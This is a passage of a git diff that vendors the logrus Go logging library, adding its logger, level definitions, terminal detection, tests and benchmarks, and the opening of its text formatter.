+		t.Fatal("Unable to format entry: ", err)
+	}
+	s := string(b)
+	if !strings.Contains(s, "timeywimey") {
+		t.Fatal("Expected JSON to format time key")
+	}
+}
+
+func TestJSONDisableTimestamp(t *testing.T) {
+	formatter := &JSONFormatter{
+		DisableTimestamp: true,
+	}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+	s := string(b)
+	if strings.Contains(s, FieldKeyTime) {
+		t.Error("Did not prevent timestamp", s)
+	}
+}
+
+func TestJSONEnableTimestamp(t *testing.T) {
+	formatter := &JSONFormatter{}
+
+	b, err := formatter.Format(WithField("level", "something"))
+	if err != nil {
+		t.Fatal("Unable to format entry: ", err)
+	}
+	s := string(b)
+	if !strings.Contains(s, FieldKeyTime) {
+		t.Error("Timestamp not present", s)
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/Sirupsen/logrus/logger.go
new file mode 100644
index 0000000000..fdaf8a6534
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/logger.go
@@ -0,0 +1,323 @@
+package logrus
+
+import (
+	"io"
+	"os"
+	"sync"
+	"sync/atomic"
+)
+
+type Logger struct {
+	// The logs are `io.Copy`'d to this in a mutex. It's common to set this to a
+	// file, or leave it default which is `os.Stderr`. You can also set this to
+	// something more adventorous, such as logging to Kafka.
+	Out io.Writer
+	// Hooks for the logger instance. These allow firing events based on logging
+	// levels and log entries. For example, to send errors to an error tracking
+	// service, log to StatsD or dump the core on fatal errors.
+	Hooks LevelHooks
+	// All log entries pass through the formatter before logged to Out. The
+	// included formatters are `TextFormatter` and `JSONFormatter` for which
+	// TextFormatter is the default. In development (when a TTY is attached) it
+	// logs with colors, but to a file it wouldn't. You can easily implement your
+	// own that implements the `Formatter` interface, see the `README` or included
+	// formatters for examples.
+	Formatter Formatter
+	// The logging level the logger should log at. This is typically (and defaults
+	// to) `logrus.Info`, which allows Info(), Warn(), Error() and Fatal() to be
+	// logged.
+	Level Level
+	// Used to sync writing to the log. Locking is enabled by Default
+	mu MutexWrap
+	// Reusable empty entry
+	entryPool sync.Pool
+}
+
+type MutexWrap struct {
+	lock     sync.Mutex
+	disabled bool
+}
+
+func (mw *MutexWrap) Lock() {
+	if !mw.disabled {
+		mw.lock.Lock()
+	}
+}
+
+func (mw *MutexWrap) Unlock() {
+	if !mw.disabled {
+		mw.lock.Unlock()
+	}
+}
+
+func (mw *MutexWrap) Disable() {
+	mw.disabled = true
+}
+
+// Creates a new logger. Configuration should be set by changing `Formatter`,
+// `Out` and `Hooks` directly on the default logger instance. You can also just
+// instantiate your own:
+//
+//    var log = &Logger{
+//      Out: os.Stderr,
+//      Formatter: new(JSONFormatter),
+//      Hooks: make(LevelHooks),
+//      Level: logrus.DebugLevel,
+//    }
+//
+// It's recommended to make this a global instance called `log`.
+func New() *Logger {
+	return &Logger{
+		Out:       os.Stderr,
+		Formatter: new(TextFormatter),
+		Hooks:     make(LevelHooks),
+		Level:     InfoLevel,
+	}
+}
+
+func (logger *Logger) newEntry() *Entry {
+	entry, ok := logger.entryPool.Get().(*Entry)
+	if ok {
+		return entry
+	}
+	return NewEntry(logger)
+}
+
+func (logger *Logger) releaseEntry(entry *Entry) {
+	logger.entryPool.Put(entry)
+}
+
+// Adds a field to the log entry, note that it doesn't log until you call
+// Debug, Print, Info, Warn, Fatal or Panic. It only creates a log entry.
+// If you want multiple fields, use `WithFields`.
+func (logger *Logger) WithField(key string, value interface{}) *Entry {
+	entry := logger.newEntry()
+	defer logger.releaseEntry(entry)
+	return entry.WithField(key, value)
+}
+
+// Adds a struct of fields to the log entry. All it does is call `WithField` for
+// each `Field`.
+func (logger *Logger) WithFields(fields Fields) *Entry {
+	entry := logger.newEntry()
+	defer logger.releaseEntry(entry)
+	return entry.WithFields(fields)
+}
+
+// Add an error as single field to the log entry.  All it does is call
+// `WithError` for the given `error`.
+func (logger *Logger) WithError(err error) *Entry {
+	entry := logger.newEntry()
+	defer logger.releaseEntry(entry)
+	return entry.WithError(err)
+}
+
+func (logger *Logger) Debugf(format string, args ...interface{}) {
+	if logger.level() >= DebugLevel {
+		entry := logger.newEntry()
+		entry.Debugf(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Infof(format string, args ...interface{}) {
+	if logger.level() >= InfoLevel {
+		entry := logger.newEntry()
+		entry.Infof(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Printf(format string, args ...interface{}) {
+	entry := logger.newEntry()
+	entry.Printf(format, args...)
+	logger.releaseEntry(entry)
+}
+
+func (logger *Logger) Warnf(format string, args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warnf(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Warningf(format string, args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warnf(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Errorf(format string, args ...interface{}) {
+	if logger.level() >= ErrorLevel {
+		entry := logger.newEntry()
+		entry.Errorf(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Fatalf(format string, args ...interface{}) {
+	if logger.level() >= FatalLevel {
+		entry := logger.newEntry()
+		entry.Fatalf(format, args...)
+		logger.releaseEntry(entry)
+	}
+	Exit(1)
+}
+
+func (logger *Logger) Panicf(format string, args ...interface{}) {
+	if logger.level() >= PanicLevel {
+		entry := logger.newEntry()
+		entry.Panicf(format, args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Debug(args ...interface{}) {
+	if logger.level() >= DebugLevel {
+		entry := logger.newEntry()
+		entry.Debug(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Info(args ...interface{}) {
+	if logger.level() >= InfoLevel {
+		entry := logger.newEntry()
+		entry.Info(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Print(args ...interface{}) {
+	entry := logger.newEntry()
+	entry.Info(args...)
+	logger.releaseEntry(entry)
+}
+
+func (logger *Logger) Warn(args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warn(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Warning(args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warn(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Error(args ...interface{}) {
+	if logger.level() >= ErrorLevel {
+		entry := logger.newEntry()
+		entry.Error(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Fatal(args ...interface{}) {
+	if logger.level() >= FatalLevel {
+		entry := logger.newEntry()
+		entry.Fatal(args...)
+		logger.releaseEntry(entry)
+	}
+	Exit(1)
+}
+
+func (logger *Logger) Panic(args ...interface{}) {
+	if logger.level() >= PanicLevel {
+		entry := logger.newEntry()
+		entry.Panic(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Debugln(args ...interface{}) {
+	if logger.level() >= DebugLevel {
+		entry := logger.newEntry()
+		entry.Debugln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Infoln(args ...interface{}) {
+	if logger.level() >= InfoLevel {
+		entry := logger.newEntry()
+		entry.Infoln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Println(args ...interface{}) {
+	entry := logger.newEntry()
+	entry.Println(args...)
+	logger.releaseEntry(entry)
+}
+
+func (logger *Logger) Warnln(args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warnln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Warningln(args ...interface{}) {
+	if logger.level() >= WarnLevel {
+		entry := logger.newEntry()
+		entry.Warnln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Errorln(args ...interface{}) {
+	if logger.level() >= ErrorLevel {
+		entry := logger.newEntry()
+		entry.Errorln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+func (logger *Logger) Fatalln(args ...interface{}) {
+	if logger.level() >= FatalLevel {
+		entry := logger.newEntry()
+		entry.Fatalln(args...)
+		logger.releaseEntry(entry)
+	}
+	Exit(1)
+}
+
+func (logger *Logger) Panicln(args ...interface{}) {
+	if logger.level() >= PanicLevel {
+		entry := logger.newEntry()
+		entry.Panicln(args...)
+		logger.releaseEntry(entry)
+	}
+}
+
+//When file is opened with appending mode, it's safe to
+//write concurrently to a file (within 4k message on Linux).
+//In these cases user can choose to disable the lock.
+func (logger *Logger) SetNoLock() {
+	logger.mu.Disable()
+}
+
+func (logger *Logger) level() Level {
+	return Level(atomic.LoadUint32((*uint32)(&logger.Level)))
+}
+
+func (logger *Logger) SetLevel(level Level) {
+	atomic.StoreUint32((*uint32)(&logger.Level), uint32(level))
+}
+
+func (logger *Logger) AddHook(hook Hook) {
+	logger.mu.Lock()
+	defer logger.mu.Unlock()
+	logger.Hooks.Add(hook)
+}
diff --git a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go
new file mode 100644
index 0000000000..dd23a3535e
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go
@@ -0,0 +1,61 @@
+package logrus
+
+import (
+	"os"
+	"testing"
+)
+
+// smallFields is a small size data set for benchmarking
+var loggerFields = Fields{
+	"foo":   "bar",
+	"baz":   "qux",
+	"one":   "two",
+	"three": "four",
+}
+
+func BenchmarkDummyLogger(b *testing.B) {
+	nullf, err := os.OpenFile("/dev/null", os.O_WRONLY, 0666)
+	if err != nil {
+		b.Fatalf("%v", err)
+	}
+	defer nullf.Close()
+	doLoggerBenchmark(b, nullf, &TextFormatter{DisableColors: true}, smallFields)
+}
+
+func BenchmarkDummyLoggerNoLock(b *testing.B) {
+	nullf, err := os.OpenFile("/dev/null", os.O_WRONLY|os.O_APPEND, 0666)
+	if err != nil {
+		b.Fatalf("%v", err)
+	}
+	defer nullf.Close()
+	doLoggerBenchmarkNoLock(b, nullf, &TextFormatter{DisableColors: true}, smallFields)
+}
+
+func doLoggerBenchmark(b *testing.B, out *os.File, formatter Formatter, fields Fields) {
+	logger := Logger{
+		Out:       out,
+		Level:     InfoLevel,
+		Formatter: formatter,
+	}
+	entry := logger.WithFields(fields)
+	b.RunParallel(func(pb *testing.PB) {
+		for pb.Next() {
+			entry.Info("aaa")
+		}
+	})
+}
+
+func doLoggerBenchmarkNoLock(b *testing.B, out *os.File, formatter Formatter, fields Fields) {
+	logger := Logger{
+		Out:       out,
+		Level:     InfoLevel,
+		Formatter: formatter,
+	}
+	logger.SetNoLock()
+	entry := logger.WithFields(fields)
+	b.RunParallel(func(pb *testing.PB) {
+		for pb.Next() {
+			entry.Info("aaa")
+		}
+	})
+}
diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/Sirupsen/logrus/logrus.go
new file mode 100644
index 0000000000..dd38999741
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/logrus.go
@@ -0,0 +1,143 @@
+package logrus
+
+import (
+	"fmt"
+	"log"
+	"strings"
+)
+
+// Fields type, used to pass to `WithFields`.
+type Fields map[string]interface{}
+
+// Level type
+type Level uint32
+
+// Convert the Level to a string. E.g. PanicLevel becomes "panic".
+func (level Level) String() string {
+	switch level {
+	case DebugLevel:
+		return "debug"
+	case InfoLevel:
+		return "info"
+	case WarnLevel:
+		return "warning"
+	case ErrorLevel:
+		return "error"
+	case FatalLevel:
+		return "fatal"
+	case PanicLevel:
+		return "panic"
+	}
+
+	return "unknown"
+}
+
+// ParseLevel takes a string level and returns the Logrus log level constant.
+func ParseLevel(lvl string) (Level, error) {
+	switch strings.ToLower(lvl) {
+	case "panic":
+		return PanicLevel, nil
+	case "fatal":
+		return FatalLevel, nil
+	case "error":
+		return ErrorLevel, nil
+	case "warn", "warning":
+		return WarnLevel, nil
+	case "info":
+		return InfoLevel, nil
+	case "debug":
+		return DebugLevel, nil
+	}
+
+	var l Level
+	return l, fmt.Errorf("not a valid logrus Level: %q", lvl)
+}
+
+// A constant exposing all logging levels
+var AllLevels = []Level{
+	PanicLevel,
+	FatalLevel,
+	ErrorLevel,
+	WarnLevel,
+	InfoLevel,
+	DebugLevel,
+}
+
+// These are the different logging levels. You can set the logging level to log
+// on your instance of logger, obtained with `logrus.New()`.
+const (
+	// PanicLevel level, highest level of severity. Logs and then calls panic with the
+	// message passed to Debug, Info, ...
+	PanicLevel Level = iota
+	// FatalLevel level. Logs and then calls `os.Exit(1)`. It will exit even if the
+	// logging level is set to Panic.
+	FatalLevel
+	// ErrorLevel level. Logs. Used for errors that should definitely be noted.
+	// Commonly used for hooks to send errors to an error tracking service.
+	ErrorLevel
+	// WarnLevel level. Non-critical entries that deserve eyes.
+	WarnLevel
+	// InfoLevel level. General operational entries about what's going on inside the
+	// application.
+	InfoLevel
+	// DebugLevel level. Usually only enabled when debugging. Very verbose logging.
+	DebugLevel
+)
+
+// Won't compile if StdLogger can't be realized by a log.Logger
+var (
+	_ StdLogger = &log.Logger{}
+	_ StdLogger = &Entry{}
+	_ StdLogger = &Logger{}
+)
+
+// StdLogger is what your logrus-enabled library should take, that way
+// it'll accept a stdlib logger and a logrus logger. There's no standard
+// interface, this is the closest we get, unfortunately.
+type StdLogger interface {
+	Print(...interface{})
+	Printf(string, ...interface{})
+	Println(...interface{})
+
+	Fatal(...interface{})
+	Fatalf(string, ...interface{})
+	Fatalln(...interface{})
+
+	Panic(...interface{})
+	Panicf(string, ...interface{})
+	Panicln(...interface{})
+}
+
+// The FieldLogger interface generalizes the Entry and Logger types
+type FieldLogger interface {
+	WithField(key string, value interface{}) *Entry
+	WithFields(fields Fields) *Entry
+	WithError(err error) *Entry
+
+	Debugf(format string, args ...interface{})
+	Infof(format string, args ...interface{})
+	Printf(format string, args ...interface{})
+	Warnf(format string, args ...interface{})
+	Warningf(format string, args ...interface{})
+	Errorf(format string, args ...interface{})
+	Fatalf(format string, args ...interface{})
+	Panicf(format string, args ...interface{})
+
+	Debug(args ...interface{})
+	Info(args ...interface{})
+	Print(args ...interface{})
+	Warn(args ...interface{})
+	Warning(args ...interface{})
+	Error(args ...interface{})
+	Fatal(args ...interface{})
+	Panic(args ...interface{})
+
+	Debugln(args ...interface{})
+	Infoln(args ...interface{})
+	Println(args ...interface{})
+	Warnln(args ...interface{})
+	Warningln(args ...interface{})
+	Errorln(args ...interface{})
+	Fatalln(args ...interface{})
+	Panicln(args ...interface{})
+}
diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/Sirupsen/logrus/logrus_test.go
new file mode 100644
index 0000000000..78cbc28259
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/logrus_test.go
@@ -0,0 +1,386 @@
+package logrus
+
+import (
+	"bytes"
+	"encoding/json"
+	"strconv"
+	"strings"
+	"sync"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func LogAndAssertJSON(t *testing.T, log func(*Logger), assertions func(fields Fields)) {
+	var buffer bytes.Buffer
+	var fields Fields
+
+	logger := New()
+	logger.Out = &buffer
+	logger.Formatter = new(JSONFormatter)
+
+	log(logger)
+
+	err := json.Unmarshal(buffer.Bytes(), &fields)
+	assert.Nil(t, err)
+
+	assertions(fields)
+}
+
+func LogAndAssertText(t *testing.T, log func(*Logger), assertions func(fields map[string]string)) {
+	var buffer bytes.Buffer
+
+	logger := New()
+	logger.Out = &buffer
+	logger.Formatter = &TextFormatter{
+		DisableColors: true,
+	}
+
+	log(logger)
+
+	fields := make(map[string]string)
+	for _, kv := range strings.Split(buffer.String(), " ") {
+		if !strings.Contains(kv, "=") {
+			continue
+		}
+		kvArr := strings.Split(kv, "=")
+		key := strings.TrimSpace(kvArr[0])
+		val := kvArr[1]
+		if kvArr[1][0] == '"' {
+			var err error
+			val, err = strconv.Unquote(val)
+			assert.NoError(t, err)
+		}
+		fields[key] = val
+	}
+	assertions(fields)
+}
+
+func TestPrint(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Print("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test")
+		assert.Equal(t, fields["level"], "info")
+	})
+}
+
+func TestInfo(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test")
+		assert.Equal(t, fields["level"], "info")
+	})
+}
+
+func TestWarn(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Warn("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test")
+		assert.Equal(t, fields["level"], "warning")
+	})
+}
+
+func TestInfolnShouldAddSpacesBetweenStrings(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Infoln("test", "test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test test")
+	})
+}
+
+func TestInfolnShouldAddSpacesBetweenStringAndNonstring(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Infoln("test", 10)
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test 10")
+	})
+}
+
+func TestInfolnShouldAddSpacesBetweenTwoNonStrings(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Infoln(10, 10)
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "10 10")
+	})
+}
+
+func TestInfoShouldAddSpacesBetweenTwoNonStrings(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Infoln(10, 10)
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "10 10")
+	})
+}
+
+func TestInfoShouldNotAddSpacesBetweenStringAndNonstring(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Info("test", 10)
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test10")
+	})
+}
+
+func TestInfoShouldNotAddSpacesBetweenStrings(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.Info("test", "test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "testtest")
+	})
+}
+
+func TestWithFieldsShouldAllowAssignments(t *testing.T) {
+	var buffer bytes.Buffer
+	var fields Fields
+
+	logger := New()
+	logger.Out = &buffer
+	logger.Formatter = new(JSONFormatter)
+
+	localLog := logger.WithFields(Fields{
+		"key1": "value1",
+	})
+
+	localLog.WithField("key2", "value2").Info("test")
+	err := json.Unmarshal(buffer.Bytes(), &fields)
+	assert.Nil(t, err)
+
+	assert.Equal(t, "value2", fields["key2"])
+	assert.Equal(t, "value1", fields["key1"])
+
+	buffer = bytes.Buffer{}
+	fields = Fields{}
+	localLog.Info("test")
+	err = json.Unmarshal(buffer.Bytes(), &fields)
+	assert.Nil(t, err)
+
+	_, ok := fields["key2"]
+	assert.Equal(t, false, ok)
+	assert.Equal(t, "value1", fields["key1"])
+}
+
+func TestUserSuppliedFieldDoesNotOverwriteDefaults(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.WithField("msg", "hello").Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test")
+	})
+}
+
+func TestUserSuppliedMsgFieldHasPrefix(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.WithField("msg", "hello").Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["msg"], "test")
+		assert.Equal(t, fields["fields.msg"], "hello")
+	})
+}
+
+func TestUserSuppliedTimeFieldHasPrefix(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.WithField("time", "hello").Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["fields.time"], "hello")
+	})
+}
+
+func TestUserSuppliedLevelFieldHasPrefix(t *testing.T) {
+	LogAndAssertJSON(t, func(log *Logger) {
+		log.WithField("level", 1).Info("test")
+	}, func(fields Fields) {
+		assert.Equal(t, fields["level"], "info")
+		assert.Equal(t, fields["fields.level"], 1.0) // JSON has floats only
+	})
+}
+
+func TestDefaultFieldsAreNotPrefixed(t *testing.T) {
+	LogAndAssertText(t, func(log *Logger) {
+		ll := log.WithField("herp", "derp")
+		ll.Info("hello")
+		ll.Info("bye")
+	}, func(fields map[string]string) {
+		for _, fieldName := range []string{"fields.level", "fields.time", "fields.msg"} {
+			if _, ok := fields[fieldName]; ok {
+				t.Fatalf("should not have prefixed %q: %v", fieldName, fields)
+			}
+		}
+	})
+}
+
+func TestDoubleLoggingDoesntPrefixPreviousFields(t *testing.T) {
+
+	var buffer bytes.Buffer
+	var fields Fields
+
+	logger := New()
+	logger.Out = &buffer
+	logger.Formatter = new(JSONFormatter)
+
+	llog := logger.WithField("context", "eating raw fish")
+
+	llog.Info("looks delicious")
+
+	err := json.Unmarshal(buffer.Bytes(), &fields)
+	assert.NoError(t, err, "should have decoded first message")
+	assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields")
+	assert.Equal(t, fields["msg"], "looks delicious")
+	assert.Equal(t, fields["context"], "eating raw fish")
+
+	buffer.Reset()
+
+	llog.Warn("omg it is!")
+
+	err = json.Unmarshal(buffer.Bytes(), &fields)
+	assert.NoError(t, err, "should have decoded second message")
+	assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields")
+	assert.Equal(t, fields["msg"], "omg it is!")
+	assert.Equal(t, fields["context"], "eating raw fish")
+	assert.Nil(t, fields["fields.msg"], "should not have prefixed previous `msg` entry")
+
+}
+
+func TestConvertLevelToString(t *testing.T) {
+	assert.Equal(t, "debug", DebugLevel.String())
+	assert.Equal(t, "info", InfoLevel.String())
+	assert.Equal(t, "warning", WarnLevel.String())
+	assert.Equal(t, "error", ErrorLevel.String())
+	assert.Equal(t, "fatal", FatalLevel.String())
+	assert.Equal(t, "panic", PanicLevel.String())
+}
+
+func TestParseLevel(t *testing.T) {
+	l, err := ParseLevel("panic")
+	assert.Nil(t, err)
+	assert.Equal(t, PanicLevel, l)
+
+	l, err = ParseLevel("PANIC")
+	assert.Nil(t, err)
+	assert.Equal(t, PanicLevel, l)
+
+	l, err = ParseLevel("fatal")
+	assert.Nil(t, err)
+	assert.Equal(t, FatalLevel, l)
+
+	l, err = ParseLevel("FATAL")
+	assert.Nil(t, err)
+	assert.Equal(t, FatalLevel, l)
+
+	l, err = ParseLevel("error")
+	assert.Nil(t, err)
+	assert.Equal(t, ErrorLevel, l)
+
+	l, err = ParseLevel("ERROR")
+	assert.Nil(t, err)
+	assert.Equal(t, ErrorLevel, l)
+
+	l, err = ParseLevel("warn")
+	assert.Nil(t, err)
+	assert.Equal(t, WarnLevel, l)
+
+	l, err = ParseLevel("WARN")
+	assert.Nil(t, err)
+	assert.Equal(t, WarnLevel, l)
+
+	l, err = ParseLevel("warning")
+	assert.Nil(t, err)
+	assert.Equal(t, WarnLevel, l)
+
+	l, err = ParseLevel("WARNING")
+	assert.Nil(t, err)
+	assert.Equal(t, WarnLevel, l)
+
+	l, err = ParseLevel("info")
+	assert.Nil(t, err)
+	assert.Equal(t, InfoLevel, l)
+
+	l, err = ParseLevel("INFO")
+	assert.Nil(t, err)
+	assert.Equal(t, InfoLevel, l)
+
+	l, err = ParseLevel("debug")
+	assert.Nil(t, err)
+	assert.Equal(t, DebugLevel, l)
+
+	l, err = ParseLevel("DEBUG")
+	assert.Nil(t, err)
+	assert.Equal(t, DebugLevel, l)
+
+	l, err = ParseLevel("invalid")
+	assert.Equal(t, "not a valid logrus Level: \"invalid\"", err.Error())
+}
+
+func TestGetSetLevelRace(t *testing.T) {
+	wg := sync.WaitGroup{}
+	for i := 0; i < 100; i++ {
+		wg.Add(1)
+		go func(i int) {
+			defer wg.Done()
+			if i%2 == 0 {
+				SetLevel(InfoLevel)
+			} else {
+				GetLevel()
+			}
+		}(i)
+
+	}
+	wg.Wait()
+}
+
+func TestLoggingRace(t *testing.T) {
+	logger := New()
+
+	var wg sync.WaitGroup
+	wg.Add(100)
+
+	for i := 0; i < 100; i++ {
+		go func() {
+			logger.Info("info")
+			wg.Done()
+		}()
+	}
+	wg.Wait()
+}
+
+// Compile test
+func TestLogrusInterface(t *testing.T) {
+	var buffer bytes.Buffer
+	fn := func(l FieldLogger) {
+		b := l.WithField("key", "value")
+		b.Debug("Test")
+	}
+	// test logger
+	logger := New()
+	logger.Out = &buffer
+	fn(logger)
+
+	// test Entry
+	e := logger.WithField("another", "value")
+	fn(e)
+}
+
+// Implements io.Writer using channels for synchronization, so we can wait on
+// the Entry.Writer goroutine to write in a non-racey way. This does assume that
+// there is a single call to Logger.Out for each message.
+type channelWriter chan []byte
+
+func (cw channelWriter) Write(p []byte) (int, error) {
+	cw <- p
+	return len(p), nil
+}
+
+func TestEntryWriter(t *testing.T) {
+	cw := channelWriter(make(chan []byte, 1))
+	log := New()
+	log.Out = cw
+	log.Formatter = new(JSONFormatter)
+	log.WithField("foo", "bar").WriterLevel(WarnLevel).Write([]byte("hello\n"))
+
+	bs := <-cw
+	var fields Fields
+	err := json.Unmarshal(bs, &fields)
+	assert.Nil(t, err)
+	assert.Equal(t, fields["foo"], "bar")
+	assert.Equal(t, fields["level"], "warning")
+}
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go
new file mode 100644
index 0000000000..4880d13d26
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go
@@ -0,0 +1,10 @@
+// +build darwin freebsd openbsd netbsd dragonfly
+// +build !appengine,!gopherjs
+
+package logrus
+
+import "golang.org/x/sys/unix"
+
+const ioctlReadTermios = unix.TIOCGETA
+
+type Termios unix.Termios
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go
new file mode 100644
index 0000000000..3de08e802f
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go
@@ -0,0 +1,11 @@
+// +build appengine gopherjs
+
+package logrus
+
+import (
+	"io"
+)
+
+func checkIfTerminal(w io.Writer) bool {
+	return true
+}
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go
new file mode 100644
index 0000000000..067047a123
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go
@@ -0,0 +1,19 @@
+// +build !appengine,!gopherjs
+
+package logrus
+
+import (
+	"io"
+	"os"
+
+	"golang.org/x/crypto/ssh/terminal"
+)
+
+func checkIfTerminal(w io.Writer) bool {
+	switch v := w.(type) {
+	case *os.File:
+		return terminal.IsTerminal(int(v.Fd()))
+	default:
+		return false
+	}
+}
diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/Sirupsen/logrus/terminal_linux.go
new file mode 100644
index 0000000000..f29a0097c8
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/terminal_linux.go
@@ -0,0 +1,14 @@
+// Based on ssh/terminal:
+// Copyright 2013 The Go Authors. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// +build !appengine,!gopherjs
+
+package logrus
+
+import "golang.org/x/sys/unix"
+
+const ioctlReadTermios = unix.TCGETS
+
+type Termios unix.Termios
diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go b/vendor/github.com/Sirupsen/logrus/text_formatter.go
new file mode 100644
index 0000000000..61b21caea4
--- /dev/null
+++ b/vendor/github.com/Sirupsen/logrus/text_formatter.go
@@ -0,0 +1,178 @@
+package logrus
+
+import (
+	"bytes"
+	"fmt"
+	"sort"
+	"strings"
+	"sync"
+	"time"
+)
+
+const (
+	nocolor = 0
+	red     = 31
+	green   = 32
+	yellow  = 33
+	blue    = 36
+	gray    = 37
+)
+
+var (
+	baseTimestamp time.Time
+)
+
+func init() {
+	baseTimestamp = time.Now()
+}
+
+// TextFormatter formats logs into text
+type TextFormatter struct {
+	// Set to true to bypass checking for a TTY before outputting colors.
+	ForceColors bool
+
+	// Force disabling colors.
+	DisableColors bool
+
+	// Disable timestamp logging. useful when output is redirected to logging
+	// system that already adds timestamps.
+	DisableTimestamp bool
+
+	// Enable logging the full timestamp when a TTY is attached instead of just
+	// the time passed since beginning of execution.
+	FullTimestamp bool
+
+	// TimestampFormat to use for display when a full timestamp is printed
+	TimestampFormat string
+
+	// The fields are sorted by default for a consistent output. For applications
+	// that log extremely frequently and don't use the JSON formatter this may not
+	// be desired.
+	DisableSorting bool
+
+	// QuoteEmptyFields will wrap empty fields in quotes if true
+	QuoteEmptyFields bool
+
+	// Whether the logger's out is to a terminal
+	isTerminal bool
+
+	sync.Once
+}
+
+func (f *TextFormatter) init(entry *Entry) {
+	if entry.Logger != nil {
+		f.isTerminal = checkIfTerminal(entry.Logger.Out)
+	}
+}
+
+// Format renders a single log entry
+func (f *TextFormatter) Format(entry *Entry) ([]byte, error) {
+	var b *bytes.Buffer
+	keys := make([]string, 0, len(entry.Data))
+	for k := range entry.Data {
+		keys = append(keys, k)
+	}
+
+	if !f.DisableSorting {
+		sort.Strings(keys)
+	}
+	if entry.Buffer != nil {
+		b = entry.Buffer
+	} else {
+		b = &bytes.Buffer{}
+	}
+
+	prefixFieldClashes(entry.Data)
+
+	f.Do(func() { f.init(entry) })
+
+	isColored := (f.ForceColors || f.isTerminal) && !f.DisableColors
+
+	timestampFormat := f.TimestampFormat
+	if timestampFormat == "" {
+		timestampFormat = defaultTimestampFormat
+	}
